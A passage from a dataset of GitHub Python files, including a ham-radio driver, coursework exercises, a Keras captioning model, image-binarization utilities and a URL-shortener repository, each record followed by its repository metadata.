else:\n raise command.CommandError(\"No RX frequency specified for the 'rx_freq' command.\")\n else:\n raise command.CommandError(\"The \"+self.driver.id+\" command handler does not have an initialized Hamlib rig.\")\n\n def settings_set_rx_freq(self):\n \"\"\" Meta-data for the \"set_rx_freq\" command.\n\n @return Returns a dictionary containing meta-data about the command.\n \"\"\"\n\n command_parameters = [\n {\n \"type\": \"number\",\n \"required\": True,\n \"title\": \"rx_frequency\",\n \"description\": \"The Icom 910's downlink frequency (in Mhz).\",\n \"integer\": False\n }\n ]\n\n return build_metadata_dict(command_parameters, 'set_rx_freq', self.name, requires_active_session = True)\n\n def command_set_tx_freq(self, active_command):\n \"\"\" Sets the uplink frequency for the radio.\n\n @note This driver works in half-duplex mode and sets the TX frequency via a split.\n @note If someone attempts to change the TX frequency while transmitting (as determined by the \n 'doppler_update_inactive_tx_delay' configuration setting), this command will fail. If the driver doesn't have \n any tnc_state service set, this protection will not take place.\n\n @throws Raises CommandError if the command fails for some reason.\n \n @param active_command The currently executing Command.\n @return Returns a dictionary containing the command response.\n \"\"\"\n\n # Stop the service if it is running\n if self.radio_rig is not None:\n if 'tx_freq' in active_command.parameters:\n # Make sure the TNC isn't transmitting\n if self.driver._tnc_state_service is not None:\n tnc_state = self.driver._tnc_state_service.get_state()\n tnc_last_transmitted = tnc_state['last_transmitted']\n tnc_buffer_len = tnc_state['output_buffer_size_bytes']\n if (int(time.time()) - tnc_last_transmitted) < self.driver.doppler_update_inactive_tx_delay or tnc_buffer_len > 0:\n raise command.CommandError(\"The pipeline's TNC has recently transmitted data or has pending data in its \"+\n \"output buffer and is not ready to have its uplink frequency changed.\")\n\n response = self.radio_rig.set_split_freq(Hamlib.RIG_VFO_MAIN, int(active_command.parameters['tx_freq']*1000000))\n\n if response is not Hamlib.RIG_OK:\n raise command.CommandError(\"An error occured while setting the radio's split TX frequency.\")\n\n # Get the main VFO frequency and update the driver state\n radio_freq = self.radio_rig.get_split_freq()\n if self.driver._radio_state['set_tx_freq'] == 0.0:\n self.driver._radio_state['set_tx_freq'] = radio_freq\n else:\n self.driver._radio_state['shifted_tx_freq'] = radio_freq\n return {'message': \"The radio's TX frequency has been set using a split.\", 'frequency': radio_freq/1000000}\n else:\n raise command.CommandError(\"No RX frequency specified for the 'rx_freq' command.\")\n else:\n raise command.CommandError(\"The \"+self.driver.id+\" command handler does not have an initialized Hamlib rig.\")\n\n def settings_set_tx_freq(self):\n \"\"\" Meta-data for the \"set_tx_freq\" command.\n\n @return Returns a dictionary containing meta-data about the command.\n \"\"\"\n\n command_parameters = [\n {\n \"type\": \"number\",\n \"required\": True,\n \"title\": \"tx_frequency\",\n \"description\": \"The Icom 910's uplink frequency (in Mhz).\",\n \"integer\": False\n }\n ]\n\n return build_metadata_dict(command_parameters, 'set_tx_freq', self.name, requires_active_session = True)\n\nclass ICOM910Error(Exception):\n pass\nclass InvalidTargetPosition(ICOM910Error):\n pass","repo_name":"MichiganExplorationLab/Mercury2-HWM","sub_path":"hwm/hardware/devices/drivers/icom_910/icom_910.py","file_name":"icom_910.py","file_ext":"py","file_size_in_byte":16413,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"12184636348","text":"# Напишите программу для проверки истинности утверждения ¬(X ⋁ Y ⋁ Z) = ¬X ⋀ ¬Y ⋀ ¬Z \n# для всех значений предикат.\n\ndef check_equality(x, y, z):\n left = not(x or y or z)\n print('left =', left)\n right = not x and not y and not z\n print('right =', right)\n print('Истинность left = right:', left == right)\n\na = input(\"X: \")\nb = input(\"Y: \")\nc = input(\"Z: \")\ncheck_equality(a, b, c)","repo_name":"Shaikhutdinova/python_dz1","sub_path":"Task02.py","file_name":"Task02.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70785217794","text":"import numpy as np\nfrom keras.models import Sequential, load_model, Model\nfrom keras.layers.core import Dense, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D, ConvLSTM2D, LSTM, Input\nfrom keras.optimizers import Adam\nfrom keras.utils import to_categorical\nfrom keras.datasets import mnist\nfrom keras import backend as K\nimport h5py\nimport json\nimport tensorflow as tf\n\n\nwith open ('dictionary.json', 'r') as f:\n dictionary = json.load(f)\n\nwith open ('id_toword.json', 'r') as f:# movie name: caption sentence\n training_label_dict = json.load(f)\nwith open ('dict.json', 'r') as f:\n one_hot = json.load(f)\n\n\ntrain_data=[]\n'''z=np.zeros((1,64,64,1))\n\nfor d in training_label_dict:\n a=np.load(\"./MLDS_hw2_1_data/training_data/feat/{}.npy\".format(d))\n a=a.reshape(80,64,64,1)\n a=np.concatenate((a,z),axis=0)\n train_data.append(a)\n'''\nfor d in training_label_dict:\n a=np.load(\"./MLDS_hw2_1_data/training_data/feat/{}.npy\".format(d))\n a=a.reshape(80,4096)\n a=np.concatenate((a,np.zeros((1,4096))),axis=0)#PAD\n #a=np.concatenate((a,np.ones((1,4096))),axis=0)#BOS\n train_data.append(a)\ntrain_data=np.array(train_data)\n\nfor d in training_label_dict:\n training_label_dict[d]+=['']\n l=len(training_label_dict[d])\n for i in range(35-l):\n training_label_dict[d]+=['']\n\ntrain_label=[]\nfor d in training_label_dict:\n a=[]\n for w in training_label_dict[d]:\n if w in one_hot:\n a.append(one_hot[w])\n else:\n a.append(one_hot[\"\"])\n train_label.append(a)\ntrain_label=np.array(train_label)\n\n#train_label=[] #ideal outputs\n\n\n#80, 4096 1450 movies\n# configure\nnum_encoder_tokens = 4096\nnum_decoder_tokens = len(dictionary)\nlatent_dim = 512\n\nout = [] # first decoder input\nfor i in range(1450):\n out.append(np.array(one_hot[\"\"]).reshape(1,num_decoder_tokens))\nout=np.array(out)\n\n\ngt=np.concatenate((out,train_label[:,0:34,:]),axis=1)\n\n# Define an input sequence and process it.\nencoder_inputs = Input(shape=(None, num_encoder_tokens))\nencoder = LSTM(latent_dim, return_state=True)\nencoder_outputs, state_h, state_c = encoder(encoder_inputs)\n# We discard `encoder_outputs` and only keep the states.\nencoder_states = [state_h, state_c]\n# Set up the decoder, using `encoder_states` as initial state.\ndecoder_inputs = Input(shape=(None, num_decoder_tokens))\n# We set up our decoder to return full output sequences,\n# and to return internal states as well. We don't use the\n# return states in the training model, but we will use them in inference.\ndecoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)\ndecoder_outputs, _, _ = decoder_lstm(decoder_inputs, initial_state=encoder_states)\ndecoder_dense = Dense(num_decoder_tokens, activation='softmax')\ndecoder_outputs = decoder_dense(decoder_outputs)\n# Define the model that will turn\n# `encoder_input_data` & `decoder_input_data` into `decoder_target_data`\nmodel = Model([encoder_inputs, decoder_inputs], decoder_outputs)\n# print the model\nprint(model.summary())\nmodel.compile(loss='categorical_crossentropy',optimizer='adam')#,metrics=['accuracy']\nResult=model.fit([train_data,gt],train_label,epochs=300,batch_size=10,verbose=1,shuffle=True)#,validation_data=(test_array_normalize, test_label_array)\n\nmodel.save('s2s_basic_dim512.h5')\n\n\n### PREDICT (INFERNECE)\n\nwith open ('MLDS_hw2_1_data/testing_label.json', 'r') as f:\n testing_label = json.load(f)\nID=[]\nfor d in testing_label:\n ID.append(d['id'])\n\ntest_data=[]\nfor i in ID:\n a=np.load(\"./MLDS_hw2_1_data/testing_data/feat/{}.npy\".format(i))\n a=a.reshape(80,4096)\n a=np.concatenate((a,np.zeros((1,4096))),axis=0)#PAD\n #a=np.concatenate((a,np.ones((1,4096))),axis=0)#BOS\n test_data.append(a)\ntest_data=np.array(test_data)\nnum_decoder_tokens = len(dictionary)\nout=[]\nfor i in range(len(ID)):\n out.append(np.array(one_hot[\"\"]).reshape(1,num_decoder_tokens))\nout=np.array(out)\n\nwith open ('vec2word.json', 'r') as f:\n vec2word = json.load(f)\n\n# define encoder inference model\nencoder_model = Model(encoder_inputs, encoder_states)\n# define decoder inference model\ndecoder_state_input_h = Input(shape=(latent_dim,))\ndecoder_state_input_c = Input(shape=(latent_dim,))\ndecoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]\n# 定義解碼器 LSTM 模型\ndecoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state=decoder_states_inputs)\ndecoder_states = [state_h, state_c]\ndecoder_outputs = decoder_dense(decoder_outputs)\ndecoder_model = Model([decoder_inputs] + decoder_states_inputs,[decoder_outputs] + decoder_states)\n\ndef decode_sequence(input_seq):\n # Encode the input as state vectors.\n states_value = encoder_model.predict(input_seq)\n\n # Sampling loop for a batch of sequences\n # (to simplify, here we assume a batch of size 1).\n ini_decoder_input = out #(100,1,2497)\n decoded_sentence = []\n for i in range(100):\n decoded_sentence.append('')\n \n for i in range(35):\n output_tokens, h, c = decoder_model.predict([ini_decoder_input] + states_value)\n ini_decoder_input=[]\n for k in range(100):\n \n #Sample a token\n sample=output_tokens[k][0]\n sample_num=np.argmax(sample)\n single_word=vec2word[str(sample_num)]\n decoded_sentence[k] += (' ' + single_word)\n\n # Update the target sequence (of length 1).\n target_seq = np.zeros((1, num_decoder_tokens))\n target_seq[0, sample_num] = 1.0\n ini_decoder_input.append(target_seq)\n # Update states\n states_value = [h, c]\n ini_decoder_input=np.array(ini_decoder_input)\n\n for i in range(100):\n tem = decoded_sentence[i].split(\"\",1)\n decoded_sentence[i]=tem[0]\n tem = decoded_sentence[i].split(\"\",1)\n decoded_sentence[i]=tem[0]\n tem = decoded_sentence[i].split(\".\",1)\n decoded_sentence[i]=tem[0]\n return decoded_sentence\n\nd_s=decode_sequence(test_data)\n#print(d_s)\nanswer=''\nfor i in range(len(ID)):\n answer+= (ID[i] + ',' + d_s[i] + '\\n')\n\n\nf=open('s2s_basic_dim512.txt','w')\nf.write(answer)\n","repo_name":"d31003/MLDS_2019spring","sub_path":"2/2-1/s2s.py","file_name":"s2s.py","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"30295661288","text":"\"\"\"add email token\n\nRevision ID: 8250c244bf1d\nRevises: 47e827ee0a4c\nCreate Date: 2022-05-12 11:11:25.507753\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '8250c244bf1d'\ndown_revision = '47e827ee0a4c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('confirmed', sa.Boolean(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'confirmed')\n # ### end Alembic commands ###\n","repo_name":"cobbai/AICenter","sub_path":"migrations/versions/8250c244bf1d_add_email_token.py","file_name":"8250c244bf1d_add_email_token.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15975960013","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\ndriver = webdriver.Chrome()\n\ndriver.get(\"https://www.solarwinds.com/\")\ntime.sleep(2)\n# driver.find_element(By.ID, 'CybotCookiebotDialogBodyLevelButtonLevelOptinAllowAll').click()\ntime.sleep(2)\n# driver.delete_cookie(\"secure\")\n# driver.delete_all_cookies()\ndriver.add_cookie({\"name\": \"Gabriel\", \"value\": \"True\"})\ntime.sleep(2)\nprint(driver.get_cookie(\"Gabriel\"))\n# print(driver.get_cookies())","repo_name":"dev-com2020/Or_Sel2","sub_path":"cooki.py","file_name":"cooki.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40470440960","text":"\"\"\"\n\nGiven an array of integers, how many three numbers can be found in the array, so that we can build an triangle\nwhose three edges length is the three numbers that we find?\n\nExample\nGiven array S = [3,4,6,7], return 3. They are:\n\n[3,4,6]\n[3,6,7]\n[4,6,7]\nGiven array S = [4,4,4,4], return 4. They are:\n\n[4(1),4(2),4(3)]\n[4(1),4(2),4(4)]\n[4(1),4(3),4(4)]\n[4(2),4(3),4(4)]\n\n\"\"\"\n\nclass Solution:\n # @param S: a list of integers\n # @return: a integer\n def triangleCount(self, S):\n # write your code here\n out = 0\n if len(S)<3 or not S:\n return out\n S.sort()\n k = len(S)-1\n while k >= 2:\n i, j = 0, k-1\n target = S[k]\n while i < j:\n if S[i] + S[j] > target:\n out += j - i\n j -= 1\n else:\n i += 1\n k -= 1\n return out\n \n","repo_name":"akb46mayu/Data-Structures-and-Algorithms","sub_path":"LintcodePartII/li382_triangleCount.py","file_name":"li382_triangleCount.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16766179790","text":"import sys\nsys.stdin = open(\"sample_input.txt\")\n\nt = int(input())\nfor tc in range(1, t+1):\n n = int(input())\n number = input() # 0으로 시작할 수 있어 str로 받는다\n numbers = [0] * 10 # 0~9까지 숫자의 개수를 담을 리스트\n\n for num in number:\n numbers[int(num)] += 1 # 리스트 numbers에 0~9 숫자 카운팅해줌\n\n card = 0 # 가장 많이 나온 숫자 0으로 초기화\n card_count = numbers[0] # 가장 많이 나온 숫자 개수 numbers[0]으로 초기화\n for i in range(1, len(numbers)): # 1부터 (numbers[0]은 이미 card_count임) numbers 길이\n if numbers[i] >= card_count: # count 가 같을때 큰 수로 바꿔줘야하기때문에 >= 로 조건 줌\n card_count = numbers[i] # card_count 변경\n card = i # card 변경\n print(f'#{tc} {card} {card_count}')\n\n\n\n\n","repo_name":"yooooonzzzzzang/Algorithm","sub_path":"01_List1_실습/02_4834_cards/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71151237634","text":"print('Задача 2. Коллекторы')\n\nname = input(\"Имя должника:\")\nsum_dolg = int(input(\"Сумма долга:\"))\nx = 0\nwhile sum_dolg != x:\n print(f\"{name}, ваша задолженность составляет {sum_dolg} рублей.\")\n x = int(input(\"Сколько рублей вы внесёте прямо сейчас, чтобы её погасить?\"))\n if x < sum_dolg:\n print(f\"Маловато, {name}. Давайте ещё раз.\")\n else:\n break\nprint(f\"Отлично, {name}! Вы погасили долг. Спасибо!\")","repo_name":"DefaultPerson/python-learn-guide","sub_path":"python_course/python_course_answers/module_0_6/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"32974764091","text":"import os\nimport numpy as np\nfrom PIL import Image\n\n#重新命名\ndef FileReName(DogType,FilePath):\n type_counter = 0\n for type in DogType:\n file_counter = 0\n subfolder = os.listdir(FilePath + type)\n for subclass in subfolder:\n file_counter += 1\n # print(\"file_counter:\",file_counter)\n # print(\"type_counter:\",type_counter)\n # print(subclass)\n os.rename(FilePath + type + \"/\" + subclass,FilePath + type + \"/\" + str(type_counter) + \"_\" + str(file_counter) + \"_\" + type + \".jpg\")\n type_counter += 1\n print(\"rename finish!\")\n\n#重新定义图片尺寸\ndef FileResize(Output_folder,DogType,FilePath,Width = 100,Height = 100):\n for type in DogType:\n subfolder = os.listdir(FilePath + type)\n for subclass in subfolder:\n img_open = Image.open(FilePath + type + \"/\" + str(subclass))\n conv_RGB = img_open.convert(\"RGB\")\n Resize_img = conv_RGB.resize((Width,Height),Image.BILINEAR)\n Resize_img.save(os.path.join(Output_folder,os.path.basename(subclass)))\n print(\"resize finish!\")\n\n\n#读取图片返回array数据\ndef ReadImage(filename,train_folder):\n img = Image.open(train_folder+filename)\n #把照片转换成nuupy数组\n return np.array(img)\n\n#图片加载到列表 图像和标签\ndef DataSet(train_folder):\n Train_list_img = []\n Train_list_label = []\n\n for file_1 in os.listdir(train_folder):\n file_img_to_array = ReadImage(file_1,train_folder)\n #添加图片数组到主list里\n Train_list_img.append(file_img_to_array)\n #添加标签数组到主list里\n Train_list_label.append(int(file_1.split(\"_\")[0]))\n # print(Train_list_label)\n\n Train_list_img = np.array(Train_list_img)\n Train_list_label = np.array(Train_list_label)\n\n print(\"dataset finish!\")\n print(Train_list_img.shape)\n print(Train_list_label.shape)\n\n\nif __name__ == \"__main__\":\n\n DogType = [\"哈士奇\",\"德国牧羊犬\",\"拉布拉多\",\"萨摩耶犬\"]\n\n # #修改名字\n # FileReName(DogType = DogType,FilePath = \"raw_image/\")\n #\n # #修改尺寸\n # FileResize(DogType = DogType,FilePath = \"raw_image/\",Output_folder = \"train_image/\")\n #\n # #准备好的数据\n # DataSet(train_folder = \"train_image/\")\n","repo_name":"W-yt/Keras","sub_path":"catdog/PreDataProcess.py","file_name":"PreDataProcess.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73042854593","text":"\"\"\" Unittest testing suite for mocks \"\"\"\n\n\nimport logging\nimport unittest\nimport sys\n\nfrom datetime import datetime\nfrom src.mocks import Calendar\nfrom unittest.mock import Mock\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setLevel(logging.DEBUG)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\nclass TestCalendars(unittest.TestCase):\n\n def test_is_weekday(self):\n calendar = Calendar()\n # Mock datetime to control today's date\n date = Mock()\n\n # Mock .today() to return Monday (0)\n date.day.return_value = 0\n # Test Monday is a weekday\n assert calendar.is_weekday(date)\n # Mock .today() to return Saturday\n date.day.return_value = 5\n # Test Saturday is not a weekday\n assert not calendar.is_weekday(date)\n logging.info(\"mocks unittest, is_weekday passed\")\n\n\n def test_is_leap_year(self):\n calendar = Calendar()\n date = Mock()\n\n date.year.side_effect = [2000, 2013, '2222']\n assert calendar.is_leap_year(date)\n assert not calendar.is_leap_year(date)\n with self.assertRaises(TypeError) as context:\n calendar.is_leap_year(date)\n self.assertTrue('not integer' in str(context.exception))\n\nif __name__ == 'unittest.__main__':\n unittest.main()\n\n\n","repo_name":"BrianCechmanek/DSOps","sub_path":"unit_testing/tests/unittests/test_mocks.py","file_name":"test_mocks.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72512185795","text":"from app.internal.repository.postgresql.connection import get_connection\nfrom app.internal.repository.postgresql.handlers.collect_response import (\n collect_response,\n)\nfrom app.internal.repository.repository import Repository\nfrom app.pkg import models\n\n__all__ = [\"ShortenerRepository\"]\n\n\nclass ShortenerRepository(Repository):\n @collect_response\n async def create(\n self,\n cmd: models.CreateShortUrlCommand\n ) -> models.ShortUrlInternal:\n q = \"\"\"\n insert into urls(\n full_url, short_url_domain, short_url_code\n ) values (\n %(full_url)s,\n %(short_url_domain)s,\n %(short_url_code)s\n )\n on conflict (full_url) do update \n set is_active = true\n returning id, full_url, short_url_domain, short_url_code;\n \"\"\"\n async with get_connection() as cur:\n await cur.execute(q, cmd.to_dict())\n return await cur.fetchone()\n\n @collect_response\n async def update_counter_value(self) -> models.CounterModel:\n q = \"\"\"\n update counters\n set value = value + 1\n where id = 1\n returning value;\n \"\"\"\n async with get_connection() as cur:\n await cur.execute(q)\n return await cur.fetchone()\n\n @collect_response\n async def delete_short_url(\n self,\n cmd: models.FullUrlCommand,\n ) -> models.UrlModel:\n q = \"\"\"\n update urls\n set is_active = false\n where short_url_code = %(short_url_code)s\n and short_url_domain = %(short_url_domain)s\n returning id, full_url, short_url_domain, short_url_code, is_active;\n \"\"\"\n async with get_connection() as cur:\n await cur.execute(q, cmd.to_dict())\n return await cur.fetchone()\n\n @collect_response\n async def read_full_url(\n self,\n cmd: models.FullUrlCommand,\n ) -> models.FullUrlModel:\n q = \"\"\"\n select full_url\n from urls\n where short_url_code = %(short_url_code)s\n and short_url_domain = %(short_url_domain)s\n and is_active = true;\n \"\"\"\n async with get_connection() as cur:\n await cur.execute(q, cmd.to_dict())\n return await cur.fetchone()\n\n @collect_response\n async def read_short_url_code(\n self,\n cmd: models.FullUrlModel,\n ) -> models.ShortUrlInternal:\n q = \"\"\"\n select id, full_url, short_url_domain, short_url_code\n from urls\n where full_url = %(full_url)s\n and is_active = true;\n \"\"\"\n async with get_connection() as cur:\n await cur.execute(q, cmd.to_dict())\n return await cur.fetchone()\n","repo_name":"newoks/URL-shortener","sub_path":"app/internal/repository/postgresql/shortener.py","file_name":"shortener.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11962522987","text":"import sys\nsys.stdin = open('input.txt')\n\nN, M = map(int,sys.stdin.readline().split())\ntree = list(map(int,sys.stdin.readline().split()))\nstart = 1\nend = max(tree)\n\n\nwhile start <= end:\n mid = (start + end) // 2\n temp = 0\n for i in tree:\n if i - mid > 0:\n temp += i - mid\n if temp >= M:\n start = mid + 1\n else:\n end = mid - 1\nprint(end)","repo_name":"sw200662/Algorithm_my","sub_path":"2112/1209/2805.py","file_name":"2805.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22829509731","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n\nclass QHarness:\n\n def __init__(self, market, trader):\n self.market = market\n self.trader = trader\n self.n = len(self.trader.traders)\n self.returns = []\n self.regrets = []\n\n def train(self, n_episodes, n_t, verbose=False):\n self.trader.switch_to_training_mode()\n\n for episode in range(n_episodes):\n\n episode_returns = []\n episode_regrets = []\n self.trader.reset()\n ws = self.trader.w\n \n for t in range(n_t):\n next_ws, actions = self.trader.act(ws)\n\n returns, raw_returns = self.market.step(ws)\n avg_r = np.sum(returns)\n regret = self._regret(raw_returns, avg_r)\n\n self.trader.step(ws, actions, self.n*[avg_r], next_ws, None)\n\n ws = next_ws\n\n episode_returns.append(avg_r)\n episode_regrets.append(regret)\n\n self.returns.append(episode_returns)\n self.regrets.append(episode_regrets)\n\n def evaluate(self, n_episodes, render=False, render_sleep=0.25):\n pass\n\n def _regret(self, rs, avg_r):\n return rs[0][self.market.best] - avg_r\n\n def plot_training_results(self, file_name=None, window=None):\n returns = np.mean(self.returns, axis=0)\n std = np.std(self.returns, axis=0)\n if window:\n returns = np.array(pd.Series(returns).rolling(window).mean()[window - 1:])\n std = np.array(pd.Series(std).rolling(window).mean()[window - 1:])\n plot_rewards(returns, std=std, file_name=file_name)\n\n def plot_training_regret(self, file_name=None, window=None):\n regrets = np.mean(self.regrets, axis=0)\n std = np.std(self.regrets, axis=0)\n if window:\n regrets = np.array(pd.Series(regrets).rolling(window).mean()[window - 1:])\n std = np.array(pd.Series(std).rolling(window).mean()[window - 1:])\n plot_rewards(regrets, std, file_name)\n\ndef plot_rewards(r, std=None, file_name=None):\n plt.figure(figsize=(8, 6), dpi=100)\n plt.plot(r)\n plt.fill_between(range(len(r)), r + std, r - std, alpha=0.2)\n plt.title('Returns Over Time')\n plt.xlabel('Timestep')\n plt.ylabel('Return')\n if file_name:\n plt.savefig('./{}'.format(file_name))\n plt.clf()\n else:\n plt.show()","repo_name":"mjhoshea/portfolio-optimisation","sub_path":"src/rl/harnesses/QHarness.py","file_name":"QHarness.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26323768683","text":"import json\nfrom traceback import print_tb\nimport numpy as np\nfrom PIL import Image\nfrom skimage.color import rgb2gray\nfrom skimage.filters import (threshold_otsu, threshold_niblack,\n threshold_sauvola, threshold_minimum, threshold_li)\n\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport os\nimport torch\n\n\nwith open(\"config.json\") as f:\n conf = json.load(f)\n\nmatplotlib.rcParams['font.size'] = 9\nth_window_size = conf[\"th_window_size\"]\n\ndef compute_threshold(input_binaries, bias, weight=1):\n n, m, k = input_binaries.shape\n pixel_image = np.zeros(input_binaries.shape[:2])\n window_image = np.zeros(input_binaries.shape[:2])\n for i in range(n):\n for j in range(m):\n #daca alb e majoritar o sa fie > 1/2\n current_pixel_sum = np.sum(input_binaries[i, j, :])\n current_pixel_th = current_pixel_sum/k \n\n left = j-th_window_size if j >= th_window_size else 0\n right = j+th_window_size if j < m-th_window_size else n\n top = i-th_window_size if i >= th_window_size else 0\n bottom = i+th_window_size if i < n-th_window_size else m\n right+=1\n bottom+=1\n #incercam sa vedem ce este majoritar intr-o fereastra\n #daca alb e majoritar o sa fie > 1/2 \n window = input_binaries[top:bottom, left:right, :]\n window_sum = np.sum(window)-current_pixel_sum\n n_elements = ((right-left)*(bottom-top)*k)-k\n window_th = window_sum/n_elements\n\n #facem o combinatie liniara intre cele 2 majoritati pentru ca vrem sa la ponderam\n #dam mai multa importanta majoritatii de pe pixelul curent\n pixel_image[i, j] = np.abs(bias-current_pixel_th)\n window_image[i, j] = window_th\n new_binary = pixel_image-window_image*weight\n \n return np.abs(new_binary)\n\ndef get_stacked_binaries(path):\n image = np.asarray(Image.open(path))[:,:,:3]\n\n gray_image = rgb2gray(image)\n \n thresh_global = threshold_otsu(gray_image)\n binary_global = gray_image > thresh_global\n\n thresh_min = threshold_li(gray_image)\n binary_min = gray_image > thresh_min\n\n window_size = 25\n thresh_niblack = threshold_niblack(gray_image, window_size=window_size, k=0.5)\n thresh_sauvola = threshold_sauvola(gray_image, window_size=window_size)\n\n binary_niblack = gray_image > thresh_niblack\n binary_sauvola = gray_image > thresh_sauvola\n\n binaries_list = [binary_global, binary_min, binary_niblack, binary_sauvola, gray_image]\n stacked_binaries = np.stack(binaries_list)\n thresh_global = np.ones(thresh_niblack.shape)*thresh_global\n thresh_list = [thresh_global, thresh_niblack, thresh_sauvola]\n\n stacked_thresh = np.stack(thresh_list)\n return stacked_binaries[:,:,:], stacked_thresh\n\ndef get_output(path):\n image = np.asarray(Image.open(path))\n if len(image.shape) == 3:\n return image[:, :, 0].reshape(1,200,-1)\n else:\n return image.reshape(1,200,-1)\n\ndef plot(image, title, row, col, pos):\n plt.subplot(row, col, pos)\n plt.imshow(image, cmap=plt.cm.gray)\n plt.title(title)\n plt.axis('off')\n\n\ndef get_numpy_data(data_path, processing, label):\n images = os.listdir(data_path)\n \n data = []\n thresh_stack = []\n for image_name in images:\n try:\n a=processing(os.path.join(data_path, image_name))\n\n if isinstance(a, tuple):\n thresh_stack.append(a[1])\n a = a[0]\n if(np.max(a)>1):\n a=a//255\n data.append(a)\n except Exception as e:\n print(image_name)\n print(e)\n exit(0)\n\n stacked_data = np.stack(data)\n print(f\"{label} shape:\"+str(stacked_data.shape))\n\n for i, j in enumerate(range(0,stacked_data.shape[0], conf[\"batch_size\"])):\n data = stacked_data[j:j+conf[\"batch_size\"],:,:,:]\n np.save(f\"{label}{i}\",data)\n return stacked_data, thresh_stack\n\n\ndef imshow(img):\n img = img / 2 + 0.5 \n plt.figure()\n plt.imshow(img,cmap = \"gray\")\n\ndef get_device():\n if torch.cuda.is_available():\n device = 'cuda:0'\n else:\n device = 'cpu'\n return device","repo_name":"gcristi23/proiectaci","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37029188458","text":"\"\"\"\nЗадание 1.\n\nПриведен код, который позволяет сохранить в\nмассиве индексы четных элементов другого массива\n\nСделайте замеры времени выполнения кода с помощью модуля timeit\n\nПопробуйте оптимизировать код, чтобы снизить время выполнения\nПроведите повторные замеры\n\nОБЯЗАТЕЛЬНО! Добавьте аналитику: что вы сделали и какой это принесло эффект\n\"\"\"\nfrom timeit import timeit\n\n\ndef func_1(nums):\n new_arr = []\n for i in range(len(nums)):\n if nums[i] % 2 == 0:\n new_arr.append(i)\n return new_arr\n\n\ndef func_2(nums):\n return [i for i, x in enumerate(nums) if x % 2 == 0]\n\n\nif __name__ == \"__main__\":\n n_tests = 1000000\n a = [x for x in range(10000)]\n print(f'Append {timeit(\"func_1(a)\", globals=globals(), number=n_tests)} sec')\n print(f'LC {timeit(\"func_2(a)\", globals=globals(), number=n_tests)} sec')\n\n\"\"\"\nAppend 120.91151649999999 sec\nLC 95.49185170000001 sec\n\nЧитаемость кода улучшилась, LC быстрее на 15-20%\n\n\"\"\"\n","repo_name":"alexsmr91/gb_python_algo","sub_path":"Урок 4. Практическое задание/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12741345367","text":"from sqlalchemy.orm import Session\nfrom typing import Union, List, Optional\n\nfrom db.models.power import Power\nfrom db.repository.utilities import _get_power_by_id\nfrom schemas.power import PowerCreate, UpdatePower\n\n\ndef create_new_power(power: PowerCreate, db: Session) -> Power:\n power_orm = Power(\n name=power.name,\n pp=power.pp,\n range=power.range,\n duration=power.duration,\n effect=power.effect,\n notes=power.notes,\n )\n db.add(power_orm)\n db.commit()\n db.refresh(power_orm)\n return power_orm\n\n\ndef retrieve_power(power_identifier: Union[int, str], db: Session) -> Optional[Power]:\n if isinstance(power_identifier, int):\n row = _get_power_by_id(power_identifier, db)\n elif isinstance(power_identifier, str):\n row = db.query(Power).filter(Power.name == power_identifier).first()\n else:\n return None\n\n if row is None:\n return None\n return row\n\n\ndef list_powers(db: Session) -> List[Power]:\n rows = 